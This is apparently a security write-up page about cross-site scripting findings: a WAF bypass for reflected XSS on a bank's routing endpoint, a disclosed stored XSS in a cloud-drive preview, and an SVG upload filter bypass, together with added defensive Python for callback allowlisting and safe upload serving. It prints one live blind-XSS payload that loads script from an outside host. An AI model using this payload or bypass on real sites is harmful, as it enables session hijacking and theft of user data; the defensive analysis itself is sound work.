Vulnerability Summary
A Reflected XSS vulnerability was identified in a navigation/routing endpoint of a financial institution's web application. The callback GET parameter is reflected unsanitized into a JavaScript context on the client side, allowing arbitrary code execution.
What made this finding particularly interesting is that a WAF was in place, blocking common XSS payloads. The bypass was achieved by combining dynamic code execution (Function()) with location.hash as an out-of-band payload delivery channel, effectively smuggling the malicious code outside the WAF's inspection scope entirely.
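The root cause described above is a callback name placed unvalidated into a JavaScript context, and the bypass works because the payload travels in `location.hash`, which the browser never sends to the server, so no server-side filter can see it. The following is an added example of the server-side fix, not code from the report or the affected application: the callback parameter is accepted only if it is a known identifier, and any data embedded next to it is JSON-encoded with HTML-significant characters escaped. The callback names, the default and the payload are constructed for the example.

```python
import json
import re

# Constructed allowlist of callback names the routing endpoint may emit.
# Assumption: the real application's callback names are not given in the write-up.
ALLOWED_CALLBACKS = {"handleNavigation", "onRouteLoaded"}
DEFAULT_CALLBACK = "handleNavigation"

# A plain (optionally dotted) JavaScript identifier. Parentheses, semicolons,
# quotes or brackets can never be part of a callback name and are rejected.
_IDENT_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")


def validate_callback(name):
    """Return `name` if it is a known callback identifier, otherwise the default.

    A WAF cannot be the control here: input delivered through location.hash
    never reaches the server, so the endpoint itself must refuse to place
    anything but a known identifier into the script body.
    """
    if not isinstance(name, str) or not _IDENT_RE.fullmatch(name):
        return DEFAULT_CALLBACK
    if name not in ALLOWED_CALLBACKS:
        return DEFAULT_CALLBACK
    return name


def encode_for_script(payload):
    """Serialize `payload` so it is safe to embed inside a <script> body.

    json.dumps with the default ensure_ascii=True already escapes U+2028/U+2029;
    '<', '>' and '&' are escaped as well so a value can never close the script
    element or open a tag if the response is ever inlined into HTML.
    """
    text = json.dumps(payload)
    return text.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_callback_response(callback_param, payload):
    """Build the routing endpoint's response body: `<callback>(<json>);`."""
    return f"{validate_callback(callback_param)}({encode_for_script(payload)});"


if __name__ == "__main__":
    # Constructed requests: one legitimate, one whose callback is not an identifier.
    print(render_callback_response("onRouteLoaded", {"route": "/accounts"}))
    print(render_callback_response("onRouteLoaded;doSomething()", {"route": "/accounts"}))
```

The allowlist check matters as much as the identifier regex: a bare identifier that is not one of the application's own functions still lets a caller pick which global gets invoked with the response data.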
Stored XSS on a cloud-drive public-share preview endpoint that serves user-uploaded HTML as text/html on the main application origin with a permissive CSP. A single click on the share link executes attacker JavaScript with same-origin access to the victim's session, allowing the attacker to impersonate the victim against every drive API — exfiltrating collaborator PII, the full file tree, payment-system identifiers and five cross-service XSRF tokens, modifying account preferences, and silently turning every private file in the victim's drive into a public URL.
HackerOne disclosed report --> https://hackerone.com/reports/3594137 by aikido_security
Stored Cross-Site Scripting via SVG File Upload Filter Bypass
'"><script src=https://xss.report/c/ketanindori></script>
...
Nice try HAHAHHAH
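Both the cloud-drive preview issue (user-uploaded HTML served as `text/html` on the application origin with a permissive CSP) and the SVG upload filter bypass above come down to the same serving decision: whether a browser is allowed to render script-capable user content with the application's origin and cookies. The following is an added example of a serving policy for uploaded files, not code from either disclosed report or the affected services. The origins, the list of script-capable types and the filenames are constructed; the real services' policies are not on the page.

```python
import mimetypes
import posixpath

# Types a browser will execute script from when it renders them as a document.
# Assumption: a starting list for review, not the affected services' own.
SCRIPT_CAPABLE_TYPES = {
    "text/html",
    "application/xhtml+xml",
    "image/svg+xml",
    "text/xml",
    "application/xml",
}

# Constructed origins: the application itself, and a dedicated cookieless
# origin used only for rendering user content.
APP_ORIGIN = "https://drive.example"
USERCONTENT_ORIGIN = "https://usercontent.example"


def content_type_for(filename):
    """Pick the served type from the stored extension, never from the uploader's header."""
    ctype, _ = mimetypes.guess_type(filename, strict=True)
    return ctype or "application/octet-stream"


def _safe_filename(filename):
    # Drop any path component and characters that would break the header quoting.
    base = posixpath.basename(filename.replace("\\", "/"))
    return base.replace('"', "").replace("\r", "").replace("\n", "") or "download"


def preview_headers(filename, serving_origin):
    """Headers for a share/preview response of an uploaded file.

    Script-capable content is rendered inline only on the separate user-content
    origin and is forced to download on the application origin. nosniff is set
    everywhere so the browser cannot reinterpret a 'harmless' type as HTML.
    """
    ctype = content_type_for(filename)
    headers = {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
    }
    disposition = "inline"
    if ctype in SCRIPT_CAPABLE_TYPES:
        if serving_origin == APP_ORIGIN:
            disposition = "attachment"
        # Even on the isolated origin, sandbox the document so it gets no
        # script execution and no same-origin privileges.
        headers["Content-Security-Policy"] = "sandbox"
    headers["Content-Disposition"] = f'{disposition}; filename="{_safe_filename(filename)}"'
    return headers


if __name__ == "__main__":
    # Constructed uploads served from the two origins.
    for name in ("index.html", "logo.svg", "photo.png"):
        print(name, "on app origin:", preview_headers(name, APP_ORIGIN))
        print(name, "on user-content origin:", preview_headers(name, USERCONTENT_ORIGIN))
```

Deriving the type from the stored extension rather than the upload's declared `Content-Type` is what closes the filter-bypass class: a file that passed the upload filter as an "image" but is actually SVG or HTML is still recognised as script-capable at serving time, and a detection rule can simply alert on any `text/html` or `image/svg+xml` response carrying `inline` from the application origin.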